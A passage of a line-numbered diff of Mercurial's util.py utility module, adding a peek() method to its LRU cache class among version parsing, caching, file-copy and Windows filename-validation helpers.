998 998 >>> versiontuple(v, 2)
999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keywords args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new code. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 def peek(self, k, default=_notset):
1341 """Get the specified item without moving it to the head
1342
1343 Unlike get(), this doesn't mutate the internal state. But be aware
1344 that it doesn't mean peek() is thread safe.
1345 """
1346 try:
1347 node = self._cache[k]
1348 return node.value
1349 except KeyError:
1350 if default is _notset:
1351 raise
1352 return default
1353
1340 1354 def clear(self):
1341 1355 n = self._head
1342 1356 while n.key is not _notset:
1343 1357 self.totalcost -= n.cost
1344 1358 n.markempty()
1345 1359 n = n.next
1346 1360
1347 1361 self._cache.clear()
1348 1362
1349 1363 def copy(self, capacity=None, maxcost=0):
1350 1364 """Create a new cache as a copy of the current one.
1351 1365
1352 1366 By default, the new cache has the same capacity as the existing one.
1353 1367 But, the cache capacity can be changed as part of performing the
1354 1368 copy.
1355 1369
1356 1370 Items in the copy have an insertion/access order matching this
1357 1371 instance.
1358 1372 """
1359 1373
1360 1374 capacity = capacity or self.capacity
1361 1375 maxcost = maxcost or self.maxcost
1362 1376 result = lrucachedict(capacity, maxcost=maxcost)
1363 1377
1364 1378 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1379 # has the correct ordering.
1366 1380
1367 1381 # Find the first non-empty entry.
1368 1382 n = self._head.prev
1369 1383 while n.key is _notset and n is not self._head:
1370 1384 n = n.prev
1371 1385
1372 1386 # We could potentially skip the first N items when decreasing capacity.
1373 1387 # But let's keep it simple unless it is a performance problem.
1374 1388 for i in range(len(self._cache)):
1375 1389 result.insert(n.key, n.value, cost=n.cost)
1376 1390 n = n.prev
1377 1391
1378 1392 return result
1379 1393
1380 1394 def popoldest(self):
1381 1395 """Remove the oldest item from the cache.
1382 1396
1383 1397 Returns the (key, value) describing the removed cache entry.
1384 1398 """
1385 1399 if not self._cache:
1386 1400 return
1387 1401
1388 1402 # Walk the linked list backwards starting at tail node until we hit
1389 1403 # a non-empty node.
1390 1404 n = self._head.prev
1391 1405 while n.key is _notset:
1392 1406 n = n.prev
1393 1407
1394 1408 key, value = n.key, n.value
1395 1409
1396 1410 # And remove it from the cache and mark it as empty.
1397 1411 del self._cache[n.key]
1398 1412 self.totalcost -= n.cost
1399 1413 n.markempty()
1400 1414
1401 1415 return key, value
1402 1416
1403 1417 def _movetohead(self, node):
1404 1418 """Mark a node as the newest, making it the new head.
1405 1419
1406 1420 When a node is accessed, it becomes the freshest entry in the LRU
1407 1421 list, which is denoted by self._head.
1408 1422
1409 1423 Visually, let's make ``N`` the new head node (* denotes head):
1410 1424
1411 1425 previous/oldest <-> head <-> next/next newest
1412 1426
1413 1427 ----<->--- A* ---<->-----
1414 1428 | |
1415 1429 E <-> D <-> N <-> C <-> B
1416 1430
1417 1431 To:
1418 1432
1419 1433 ----<->--- N* ---<->-----
1420 1434 | |
1421 1435 E <-> D <-> C <-> B <-> A
1422 1436
1423 1437 This requires the following moves:
1424 1438
1425 1439 C.next = D (node.prev.next = node.next)
1426 1440 D.prev = C (node.next.prev = node.prev)
1427 1441 E.next = N (head.prev.next = node)
1428 1442 N.prev = E (node.prev = head.prev)
1429 1443 N.next = A (node.next = head)
1430 1444 A.prev = N (head.prev = node)
1431 1445 """
1432 1446 head = self._head
1433 1447 # C.next = D
1434 1448 node.prev.next = node.next
1435 1449 # D.prev = C
1436 1450 node.next.prev = node.prev
1437 1451 # N.prev = E
1438 1452 node.prev = head.prev
1439 1453 # N.next = A
1440 1454 # It is tempting to do just "head" here, however if node is
1441 1455 # adjacent to head, this will do bad things.
1442 1456 node.next = head.prev.next
1443 1457 # E.next = N
1444 1458 node.next.prev = node
1445 1459 # A.prev = N
1446 1460 node.prev.next = node
1447 1461
1448 1462 self._head = node
1449 1463
1450 1464 def _addcapacity(self):
1451 1465 """Add a node to the circular linked list.
1452 1466
1453 1467 The new node is inserted before the head node.
1454 1468 """
1455 1469 head = self._head
1456 1470 node = _lrucachenode()
1457 1471 head.prev.next = node
1458 1472 node.prev = head.prev
1459 1473 node.next = head
1460 1474 head.prev = node
1461 1475 self._size += 1
1462 1476 return node
1463 1477
1464 1478 def _enforcecostlimit(self):
1465 1479 # This should run after an insertion. It should only be called if total
1466 1480 # cost limits are being enforced.
1467 1481 # The most recently inserted node is never evicted.
1468 1482 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1483 return
1470 1484
1471 1485 # This is logically equivalent to calling popoldest() until we
1472 1486 # free up enough cost. We don't do that since popoldest() needs
1473 1487 # to walk the linked list and doing this in a loop would be
1474 1488 # quadratic. So we find the first non-empty node and then
1475 1489 # walk nodes until we free up enough capacity.
1476 1490 #
1477 1491 # If we only removed the minimum number of nodes to free enough
1478 1492 # cost at insert time, chances are high that the next insert would
1479 1493 # also require pruning. This would effectively constitute quadratic
1480 1494 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1495 # target cost that is a percentage of the max cost. This will tend
1482 1496 # to free more nodes when the high water mark is reached, which
1483 1497 # lowers the chances of needing to prune on the subsequent insert.
1484 1498 targetcost = int(self.maxcost * 0.75)
1485 1499
1486 1500 n = self._head.prev
1487 1501 while n.key is _notset:
1488 1502 n = n.prev
1489 1503
1490 1504 while len(self) > 1 and self.totalcost > targetcost:
1491 1505 del self._cache[n.key]
1492 1506 self.totalcost -= n.cost
1493 1507 n.markempty()
1494 1508 n = n.prev
1495 1509
1496 1510 def lrucachefunc(func):
1497 1511 '''cache most recent results of function calls'''
1498 1512 cache = {}
1499 1513 order = collections.deque()
1500 1514 if func.__code__.co_argcount == 1:
1501 1515 def f(arg):
1502 1516 if arg not in cache:
1503 1517 if len(cache) > 20:
1504 1518 del cache[order.popleft()]
1505 1519 cache[arg] = func(arg)
1506 1520 else:
1507 1521 order.remove(arg)
1508 1522 order.append(arg)
1509 1523 return cache[arg]
1510 1524 else:
1511 1525 def f(*args):
1512 1526 if args not in cache:
1513 1527 if len(cache) > 20:
1514 1528 del cache[order.popleft()]
1515 1529 cache[args] = func(*args)
1516 1530 else:
1517 1531 order.remove(args)
1518 1532 order.append(args)
1519 1533 return cache[args]
1520 1534
1521 1535 return f
1522 1536
1523 1537 class propertycache(object):
1524 1538 def __init__(self, func):
1525 1539 self.func = func
1526 1540 self.name = func.__name__
1527 1541 def __get__(self, obj, type=None):
1528 1542 result = self.func(obj)
1529 1543 self.cachevalue(obj, result)
1530 1544 return result
1531 1545
1532 1546 def cachevalue(self, obj, value):
1533 1547 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1548 obj.__dict__[self.name] = value
1535 1549
1536 1550 def clearcachedproperty(obj, prop):
1537 1551 '''clear a cached property value, if one has been set'''
1538 1552 prop = pycompat.sysstr(prop)
1539 1553 if prop in obj.__dict__:
1540 1554 del obj.__dict__[prop]
1541 1555
1542 1556 def increasingchunks(source, min=1024, max=65536):
1543 1557 '''return no less than min bytes per chunk while data remains,
1544 1558 doubling min after each chunk until it reaches max'''
1545 1559 def log2(x):
1546 1560 if not x:
1547 1561 return 0
1548 1562 i = 0
1549 1563 while x:
1550 1564 x >>= 1
1551 1565 i += 1
1552 1566 return i - 1
1553 1567
1554 1568 buf = []
1555 1569 blen = 0
1556 1570 for chunk in source:
1557 1571 buf.append(chunk)
1558 1572 blen += len(chunk)
1559 1573 if blen >= min:
1560 1574 if min < max:
1561 1575 min = min << 1
1562 1576 nmin = 1 << log2(blen)
1563 1577 if nmin > min:
1564 1578 min = nmin
1565 1579 if min > max:
1566 1580 min = max
1567 1581 yield ''.join(buf)
1568 1582 blen = 0
1569 1583 buf = []
1570 1584 if buf:
1571 1585 yield ''.join(buf)
1572 1586
1573 1587 def always(fn):
1574 1588 return True
1575 1589
1576 1590 def never(fn):
1577 1591 return False
1578 1592
1579 1593 def nogc(func):
1580 1594 """disable garbage collector
1581 1595
1582 1596 Python's garbage collector triggers a GC each time a certain number of
1583 1597 container objects (the number being defined by gc.get_threshold()) are
1584 1598 allocated even when marked not to be tracked by the collector. Tracking has
1585 1599 no effect on when GCs are triggered, only on what objects the GC looks
1586 1600 into. As a workaround, disable GC while building complex (huge)
1587 1601 containers.
1588 1602
1589 1603 This garbage collector issue have been fixed in 2.7. But it still affect
1590 1604 CPython's performance.
1591 1605 """
1592 1606 def wrapper(*args, **kwargs):
1593 1607 gcenabled = gc.isenabled()
1594 1608 gc.disable()
1595 1609 try:
1596 1610 return func(*args, **kwargs)
1597 1611 finally:
1598 1612 if gcenabled:
1599 1613 gc.enable()
1600 1614 return wrapper
1601 1615
1602 1616 if pycompat.ispypy:
1603 1617 # PyPy runs slower with gc disabled
1604 1618 nogc = lambda x: x
1605 1619
1606 1620 def pathto(root, n1, n2):
1607 1621 '''return the relative path from one place to another.
1608 1622 root should use os.sep to separate directories
1609 1623 n1 should use os.sep to separate directories
1610 1624 n2 should use "/" to separate directories
1611 1625 returns an os.sep-separated path.
1612 1626
1613 1627 If n1 is a relative path, it's assumed it's
1614 1628 relative to root.
1615 1629 n2 should always be relative to root.
1616 1630 '''
1617 1631 if not n1:
1618 1632 return localpath(n2)
1619 1633 if os.path.isabs(n1):
1620 1634 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1621 1635 return os.path.join(root, localpath(n2))
1622 1636 n2 = '/'.join((pconvert(root), n2))
1623 1637 a, b = splitpath(n1), n2.split('/')
1624 1638 a.reverse()
1625 1639 b.reverse()
1626 1640 while a and b and a[-1] == b[-1]:
1627 1641 a.pop()
1628 1642 b.pop()
1629 1643 b.reverse()
1630 1644 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1631 1645
1632 1646 # the location of data files matching the source code
1633 1647 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1634 1648 # executable version (py2exe) doesn't support __file__
1635 1649 datapath = os.path.dirname(pycompat.sysexecutable)
1636 1650 else:
1637 1651 datapath = os.path.dirname(pycompat.fsencode(__file__))
1638 1652
1639 1653 i18n.setdatapath(datapath)
1640 1654
1641 1655 def checksignature(func):
1642 1656 '''wrap a function with code to check for calling errors'''
1643 1657 def check(*args, **kwargs):
1644 1658 try:
1645 1659 return func(*args, **kwargs)
1646 1660 except TypeError:
1647 1661 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1648 1662 raise error.SignatureError
1649 1663 raise
1650 1664
1651 1665 return check
1652 1666
1653 1667 # a whilelist of known filesystems where hardlink works reliably
1654 1668 _hardlinkfswhitelist = {
1655 1669 'apfs',
1656 1670 'btrfs',
1657 1671 'ext2',
1658 1672 'ext3',
1659 1673 'ext4',
1660 1674 'hfs',
1661 1675 'jfs',
1662 1676 'NTFS',
1663 1677 'reiserfs',
1664 1678 'tmpfs',
1665 1679 'ufs',
1666 1680 'xfs',
1667 1681 'zfs',
1668 1682 }
1669 1683
1670 1684 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1671 1685 '''copy a file, preserving mode and optionally other stat info like
1672 1686 atime/mtime
1673 1687
1674 1688 checkambig argument is used with filestat, and is useful only if
1675 1689 destination file is guarded by any lock (e.g. repo.lock or
1676 1690 repo.wlock).
1677 1691
1678 1692 copystat and checkambig should be exclusive.
1679 1693 '''
1680 1694 assert not (copystat and checkambig)
1681 1695 oldstat = None
1682 1696 if os.path.lexists(dest):
1683 1697 if checkambig:
1684 1698 oldstat = checkambig and filestat.frompath(dest)
1685 1699 unlink(dest)
1686 1700 if hardlink:
1687 1701 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1688 1702 # unless we are confident that dest is on a whitelisted filesystem.
1689 1703 try:
1690 1704 fstype = getfstype(os.path.dirname(dest))
1691 1705 except OSError:
1692 1706 fstype = None
1693 1707 if fstype not in _hardlinkfswhitelist:
1694 1708 hardlink = False
1695 1709 if hardlink:
1696 1710 try:
1697 1711 oslink(src, dest)
1698 1712 return
1699 1713 except (IOError, OSError):
1700 1714 pass # fall back to normal copy
1701 1715 if os.path.islink(src):
1702 1716 os.symlink(os.readlink(src), dest)
1703 1717 # copytime is ignored for symlinks, but in general copytime isn't needed
1704 1718 # for them anyway
1705 1719 else:
1706 1720 try:
1707 1721 shutil.copyfile(src, dest)
1708 1722 if copystat:
1709 1723 # copystat also copies mode
1710 1724 shutil.copystat(src, dest)
1711 1725 else:
1712 1726 shutil.copymode(src, dest)
1713 1727 if oldstat and oldstat.stat:
1714 1728 newstat = filestat.frompath(dest)
1715 1729 if newstat.isambig(oldstat):
1716 1730 # stat of copied file is ambiguous to original one
1717 1731 advanced = (
1718 1732 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1719 1733 os.utime(dest, (advanced, advanced))
1720 1734 except shutil.Error as inst:
1721 1735 raise error.Abort(str(inst))
1722 1736
1723 1737 def copyfiles(src, dst, hardlink=None, progress=None):
1724 1738 """Copy a directory tree using hardlinks if possible."""
1725 1739 num = 0
1726 1740
1727 1741 def settopic():
1728 1742 if progress:
1729 1743 progress.topic = _('linking') if hardlink else _('copying')
1730 1744
1731 1745 if os.path.isdir(src):
1732 1746 if hardlink is None:
1733 1747 hardlink = (os.stat(src).st_dev ==
1734 1748 os.stat(os.path.dirname(dst)).st_dev)
1735 1749 settopic()
1736 1750 os.mkdir(dst)
1737 1751 for name, kind in listdir(src):
1738 1752 srcname = os.path.join(src, name)
1739 1753 dstname = os.path.join(dst, name)
1740 1754 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1741 1755 num += n
1742 1756 else:
1743 1757 if hardlink is None:
1744 1758 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1745 1759 os.stat(os.path.dirname(dst)).st_dev)
1746 1760 settopic()
1747 1761
1748 1762 if hardlink:
1749 1763 try:
1750 1764 oslink(src, dst)
1751 1765 except (IOError, OSError):
1752 1766 hardlink = False
1753 1767 shutil.copy(src, dst)
1754 1768 else:
1755 1769 shutil.copy(src, dst)
1756 1770 num += 1
1757 1771 if progress:
1758 1772 progress.increment()
1759 1773
1760 1774 return hardlink, num
1761 1775
1762 1776 _winreservednames = {
1763 1777 'con', 'prn', 'aux', 'nul',
1764 1778 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1765 1779 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1766 1780 }
1767 1781 _winreservedchars = ':*?"<>|'
1768 1782 def checkwinfilename(path):
1769 1783 r'''Check that the base-relative path is a valid filename on Windows.
1770 1784 Returns None if the path is ok, or a UI string describing the problem.
1771 1785
1772 1786 >>> checkwinfilename(b"just/a/normal/path")
1773 1787 >>> checkwinfilename(b"foo/bar/con.xml")
1774 1788 "filename contains 'con', which is reserved on Windows"
1775 1789 >>> checkwinfilename(b"foo/con.xml/bar")
1776 1790 "filename contains 'con', which is reserved on Windows"
1777 1791 >>> checkwinfilename(b"foo/bar/xml.con")
1778 1792 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1779 1793 "filename contains 'AUX', which is reserved on Windows"
1780 1794 >>> checkwinfilename(b"foo/bar/bla:.txt")
1781 1795 "filename contains ':', which is reserved on Windows"
1782 1796 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1783 1797 "filename contains '\\x07', which is invalid on Windows"
1784 1798 >>> checkwinfilename(b"foo/bar/bla ")
1785 1799 "filename ends with ' ', which is not allowed on Windows"
1786 1800 >>> checkwinfilename(b"../bar")
1787 1801 >>> checkwinfilename(b"foo\\")
1788 1802 "filename ends with '\\', which is invalid on Windows"
1789 1803 >>> checkwinfilename(b"foo\\/bar")
1790 1804 "directory name ends with '\\', which is invalid on Windows"
1791 1805 '''
1792 1806 if path.endswith('\\'):
1793 1807 return _("filename ends with '\\', which is invalid on Windows")
1794 1808 if '\\/' in path:
1795 1809 return _("directory name ends with '\\', which is invalid on Windows")
1796 1810 for n in path.replace('\\', '/').split('/'):
1797 1811 if not n:
1798 1812 continue
1799 1813 for c in _filenamebytestr(n):
1800 1814 if c in _winreservedchars:
1801 1815 return _("filename contains '%s', which is reserved "
1802 1816 "on Windows") % c
1803 1817 if ord(c) <= 31:
1804 1818 return _("filename contains '%s', which is invalid "
1805 1819 "on Windows") % stringutil.escapestr(c)
1806 1820 base = n.split('.')[0]
1807 1821 if base and base.lower() in _winreservednames:
1808 1822 return _("filename contains '%s', which is reserved "
1809 1823 "on Windows") % base
1810 1824 t = n[-1:]
1811 1825 if t in '. ' and n not in '..':
1812 1826 return _("filename ends with '%s', which is not allowed "
1813 1827 "on Windows") % t
1814 1828
1815 1829 if pycompat.iswindows:
1816 1830 checkosfilename = checkwinfilename
1817 1831 timer = time.clock
1818 1832 else:
1819 1833 checkosfilename = platform.checkosfilename
1820 1834 timer = time.time
1821 1835
1822 1836 if safehasattr(time, "perf_counter"):
1823 1837 timer = time.perf_counter
1824 1838
1825 1839 def makelock(info, pathname):
1826 1840 """Create a lock file atomically if possible
1827 1841
1828 1842 This may leave a stale lock file if symlink isn't supported and signal
1829 1843 interrupt is enabled.
1830 1844 """
1831 1845 try:
1832 1846 return os.symlink(info, pathname)
1833 1847 except OSError as why:
1834 1848 if why.errno == errno.EEXIST:
1835 1849 raise
1836 1850 except AttributeError: # no symlink in os
1837 1851 pass
1838 1852
1839 1853 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1840 1854 ld = os.open(pathname, flags)
1841 1855 os.write(ld, info)
1842 1856 os.close(ld)
1843 1857
1844 1858 def readlock(pathname):
1845 1859 try:
1846 1860 return readlink(pathname)
1847 1861 except OSError as why:
1848 1862 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1849 1863 raise
1850 1864 except AttributeError: # no symlink in os
1851 1865 pass
1852 1866 with posixfile(pathname, 'rb') as fp:
1853 1867 return fp.read()
1854 1868
1855 1869 def fstat(fp):
1856 1870 '''stat file object that may not have fileno method.'''
1857 1871 try:
1858 1872 return os.fstat(fp.fileno())
1859 1873 except AttributeError:
1860 1874 return os.stat(fp.name)
1861 1875
1862 1876 # File system features
1863 1877
1864 1878 def fscasesensitive(path):
1865 1879 """
1866 1880 Return true if the given path is on a case-sensitive filesystem
1867 1881
1868 1882 Requires a path (like /foo/.hg) ending with a foldable final
1869 1883 directory component.
1870 1884 """
1871 1885 s1 = os.lstat(path)
1872 1886 d, b = os.path.split(path)
1873 1887 b2 = b.upper()
1874 1888 if b == b2:
1875 1889 b2 = b.lower()
1876 1890 if b == b2:
1877 1891 return True # no evidence against case sensitivity
1878 1892 p2 = os.path.join(d, b2)
1879 1893 try:
1880 1894 s2 = os.lstat(p2)
1881 1895 if s2 == s1:
1882 1896 return False
1883 1897 return True
1884 1898 except OSError:
1885 1899 return True
1886 1900
1887 1901 try:
1888 1902 import re2
1889 1903 _re2 = None
1890 1904 except ImportError:
1891 1905 _re2 = False
1892 1906
1893 1907 class _re(object):
1894 1908 def _checkre2(self):
1895 1909 global _re2
1896 1910 try:
1897 1911 # check if match works, see issue3964
1898 1912 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1899 1913 except ImportError:
1900 1914 _re2 = False
1901 1915
1902 1916 def compile(self, pat, flags=0):
1903 1917 '''Compile a regular expression, using re2 if possible
1904 1918
1905 1919 For best performance, use only re2-compatible regexp features. The
1906 1920 only flags from the re module that are re2-compatible are
1907 1921 IGNORECASE and MULTILINE.'''
1908 1922 if _re2 is None:
1909 1923 self._checkre2()
